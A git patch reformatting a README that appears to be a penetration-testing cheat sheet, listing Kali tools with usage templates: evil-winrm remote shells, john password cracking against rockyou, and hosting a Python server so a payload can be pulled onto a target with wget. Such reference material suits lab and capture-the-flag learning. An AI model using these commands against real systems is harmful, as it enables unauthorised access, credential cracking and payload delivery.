From 77aa962c256e50146b2e59f3611e853e3bb3b35c Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Sat, 30 Jul 2022 16:04:12 -0400
Subject: [PATCH] Update README.md
---
README.md | 55 +++++++++++++++++++++++++++----------------------------
1 file changed, 27 insertions(+), 28 deletions(-)
diff --git a/README.md b/README.md
index dee7daf..71be5e9 100644
--- a/README.md
+++ b/README.md
@@ -211,21 +211,17 @@ smbclient -N \\\\{TARGET_IP}\\{SHARE} -u Administrator
-**OVERVIEW**
-
-| | |
-| :-----------: | :-----------: |
-| Description | A tool used to hack WINRM from a linux console |
-| Download | Pre-installed on Kali Linux |
-
-
-
-**USAGE**
-
-
-
```bash
+# About: A tool used to hack WINRM from a linux console
+# Download: Pre-installed on Kali Linux
+
+# Usage
evil-winrm -i {IP ADDRESS} -u {USERNAME} -p {PASSWORD}
+
+# Note: Requires credentials
+# {IP ADDRESS}: IP Address of the Server
+# {USERNAME}: User Authentication
+# {PASSWORD}: Password Authentication
```
@@ -252,7 +248,12 @@ evil-winrm -i {IP ADDRESS} -u {USERNAME} -p {PASSWORD}
```bash
-john -w=/usr/share/wordlists/rockyou.txt {file.txt}
+# About: A tool used to crack passwords and hashes
+# Download: Pre-installed on Kali Linux
+
+john -w=/usr/share/wordlists/rockyou.txt {FILE.txt}
+
+# {FILE.txt}: File containing the words to crack
```
@@ -261,36 +262,34 @@ john -w=/usr/share/wordlists/rockyou.txt {file.txt}
***
-## Python Server [1]
-
-
-
-**USAGE**
+## Host Python Server [STEP 1]
```bash
-# Host a personal server on client machine
+# About: A python command used to open a server on the client machine
+# Download: Pre-installed on Kali Linux
+
+# USAGE
sudo python3 -m http.server {PORT}
-# {PORT}: Port to open for transfer
+# {PORT}: Port to open for file transfer
```
-## WGET [2]
-
-
-
-**USAGE**
+## Download File with WGET [STEP 2]
```bash
+# About: A command used to download files on the current machine
+# Download: Pre-installed on Kali Linux
+
# Download files on the remote machine
wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
-# {IP ADDRESS}: Python Server IP Address
-# {FILE}: The payload to be trasnfered
+# {IP ADDRESS}: Python Server IP Address from step one
+# {FILE}: The payload to be trasnfered
```